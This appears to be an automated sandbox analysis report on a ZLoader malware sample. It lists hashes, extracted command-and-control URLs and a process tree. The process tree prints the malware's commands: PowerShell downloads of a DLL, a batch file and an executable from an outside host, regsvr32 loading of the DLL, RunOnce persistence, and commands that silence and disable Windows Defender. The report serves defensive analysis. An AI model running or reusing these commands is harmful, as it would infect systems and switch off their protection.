Analysis
-
max time kernel
78s -
max time network
154s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
16-08-2021 17:59
Static task
static1
Behavioral task
behavioral1
Sample
8f87fe90d589a4fa73cff6a242fe222b.exe
Resource
win7v20210410
General
-
Target
8f87fe90d589a4fa73cff6a242fe222b.exe
-
Size
165KB
-
MD5
8f87fe90d589a4fa73cff6a242fe222b
-
SHA1
381e33872d0f6f1a7233beeb6e9524435c2a9ab6
-
SHA256
edaabcb2e82b51c9b8df54dc82afc494bff804b1b187c4657ab583e8ca0bd052
-
SHA512
f0ce6885ac47429df5a1a0779c9a455300d77284ef71ff1e344afe2344513b430705ce50d62fceddb051cb5df8b67e1c4969b377413647f4cbe23fc87351aca0
Malware Config
Extracted
zloader
ivan
ivan
https://iqowijsdakm.com/gate.php
https://wiewjdmkfjn.com/gate.php
https://dksaoidiakjd.com/gate.php
https://iweuiqjdakjd.com/gate.php
https://yuidskadjna.com/gate.php
https://olksmadnbdj.com/gate.php
https://odsakmdfnbs.com/gate.php
https://odsakjmdnhsaj.com/gate.php
https://odjdnhsaj.com/gate.php
https://odoishsaj.com/gate.php
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 8 4000 powershell.exe -
Downloads MZ/PE file
-
Loads dropped DLL 1 IoCs
Processes:
regsvr32.exepid process 2680 regsvr32.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
8f87fe90d589a4fa73cff6a242fe222b.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce 8f87fe90d589a4fa73cff6a242fe222b.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 8f87fe90d589a4fa73cff6a242fe222b.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 4000 powershell.exe 4000 powershell.exe 4000 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4000 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
8f87fe90d589a4fa73cff6a242fe222b.execmd.exeregsvr32.exedescription pid process target process PID 636 wrote to memory of 2696 636 8f87fe90d589a4fa73cff6a242fe222b.exe cmd.exe PID 636 wrote to memory of 2696 636 8f87fe90d589a4fa73cff6a242fe222b.exe cmd.exe PID 2696 wrote to memory of 4000 2696 cmd.exe powershell.exe PID 2696 wrote to memory of 4000 2696 cmd.exe powershell.exe PID 2696 wrote to memory of 3788 2696 cmd.exe regsvr32.exe PID 2696 wrote to memory of 3788 2696 cmd.exe regsvr32.exe PID 3788 wrote to memory of 2680 3788 regsvr32.exe regsvr32.exe PID 3788 wrote to memory of 2680 3788 regsvr32.exe regsvr32.exe PID 3788 wrote to memory of 2680 3788 regsvr32.exe regsvr32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8f87fe90d589a4fa73cff6a242fe222b.exe"C:\Users\Admin\AppData\Local\Temp\8f87fe90d589a4fa73cff6a242fe222b.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Windows\SYSTEM32\cmd.execmd /c start.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://pornotublovers.com/JavaP.dll -OutFile JavaP.dll3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4000 -
C:\Windows\system32\regsvr32.exeregsvr32 JavaP.dll3⤵
- Suspicious use of WriteProcessMemory
PID:3788 -
C:\Windows\SysWOW64\regsvr32.exeJavaP.dll4⤵
- Loads dropped DLL
PID:2680 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe5⤵PID:1252
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat3⤵PID:3988
-
C:\Windows\system32\cmd.execmd /c nsudo.bat3⤵PID:696
-
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"4⤵PID:4036
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe4⤵PID:3520
-
C:\Users\Admin\AppData\Roaming\javase.exejavase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f4⤵PID:2128
-
C:\Users\Admin\AppData\Roaming\javase.exejavase -U:T sc config WinDefend start= disabled4⤵PID:3880
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
42d4b1d78e6e092af15c7aef34e5cf45
SHA16cf9d0e674430680f67260194d3185667a2bb77b
SHA256c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0
SHA512d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930
-
MD5
0cd0a4725424c6df02ba40663fe0a2e6
SHA1e76591c9570c1d3c33a1e7f9f2c650a30e6f0224
SHA25680f165cabec26b89962bed756c8478b5510f8da3740c46faf45e932a355a6e12
SHA5129ea8888e38b986c3fd651ccabb22666f17517a208c92feca4cc8660a599c98bb8cf4764afda2e524014e682f5979649d05af784be5b6950073ec1af55e54939c
-
MD5
81a4f63ee9c9c9fd7a1d97d03641813f
SHA13e3ce1ac1bd5457c7d3aa1260d2ace3f9f39b476
SHA256ed36d6e9e0ed6cbde1dd007db49a5a48853bc8eb3c299b9e62531089dfbf3a01
SHA51225ab9f55ac0b67a5052a8f393d241c352ba3bbc627baef156a7e836ed6c21f6dd83d93322cc4e4d152c83bca80a1c463af28b8ba61a9bf73202a8fcd525439a7
-
MD5
676d31dd4a8405ead757e0b72d6bd381
SHA1789a5fc1af78a0630ae705f6dd5506dd476d9d0f
SHA25657d69a6ca957beb5c9eed7f39d0bb56e6d3348bd510fbba10ad0c19438a712b7
SHA51279cc7bd42feb80d9a552f2fd6145795ab1904ca7c8d4175f70f9225b04eddcc7107ebf4391eac9d578ed7b963ce192df58050e73b8eaed30e3ef89405e18028c
-
MD5
23cb9715b98c53a8351d0cfb3d0a24eb
SHA14048470f92c65898b3e7186cc98108b74e4b2171
SHA256bf74dac2db3967e1d661db1bfdbee8fe546bd19ecdcef0baf6b61fb3f78a89d7
SHA5124b3753020e795b8ba96d292097633a837579aa3b5fa68f7b39f8d76ce3bf3cec6a43663526f9ae79283b4a9aa9034ab96605a554b035ff35f6e10a42bf3efdc1
-
MD5
5cae01aea8ed390ce9bec17b6c1237e4
SHA13a80a49efaac5d839400e4fb8f803243fb39a513
SHA25619896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
-
MD5
5cae01aea8ed390ce9bec17b6c1237e4
SHA13a80a49efaac5d839400e4fb8f803243fb39a513
SHA25619896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
SHA512c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
-
MD5
6f10d512d4cbb527fd26ae266d0a4aef
SHA16e42d51ff2d42c5f999943b329a655e901ea4b32
SHA256b37efaf69f5484fd2e4ec9c83553b9788e39a10fc4390065c29d59f770f34943
SHA5124f66e8435b8439ace551ad8a70483926891ff3f55b27688602b2e0c58999054bd430308879374f4e8c990a91c3e9cc9cd78b6d355d4370051528bce536e1028e
-
MD5
23cb9715b98c53a8351d0cfb3d0a24eb
SHA14048470f92c65898b3e7186cc98108b74e4b2171
SHA256bf74dac2db3967e1d661db1bfdbee8fe546bd19ecdcef0baf6b61fb3f78a89d7
SHA5124b3753020e795b8ba96d292097633a837579aa3b5fa68f7b39f8d76ce3bf3cec6a43663526f9ae79283b4a9aa9034ab96605a554b035ff35f6e10a42bf3efdc1